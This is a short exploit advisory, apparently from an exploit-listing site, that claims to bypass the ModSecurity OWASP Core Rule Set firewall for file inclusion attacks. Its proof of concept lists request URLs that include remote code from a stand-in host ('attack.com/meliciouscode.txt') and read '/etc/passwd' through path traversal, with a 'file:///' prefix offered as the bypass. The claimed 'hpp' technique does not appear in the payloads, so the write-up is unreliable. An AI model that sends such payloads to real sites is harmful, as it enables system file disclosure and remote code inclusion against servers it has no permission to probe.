Modsecurity Owasp crs Firewall (WAF) - LFI/RFI hpp (bypass)

2019.01.21
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Exploit title : Modsecurity Owasp crs - LFI/RFI hpp (bypass) Exploit author : Salvatrucha software link : https://modsecurity.org/crs/ Tested on : Win7_64 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 >Installation : CRS 3 requires an Apache/IIS/Nginx web server with ModSecurity 2.8.0 or higher HTTPS : git clone https://github.com/SpiderLabs/owasp-modsecurity-crs.git SSH : git clone git@github.com:SpiderLabs/owasp-modsecurity-crs.git >proof of concept target.com/search.php?q=http://attack.com/meliciouscode.txt target.com/search.php?q=../../etc/passwd ##show forbidden message target.com/search.php?q=file:///attack.com/meliciouscode.txt target.com/search.php?q=file:///../../etc/passwd ##The request will be done

References:

Salvatrucha


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top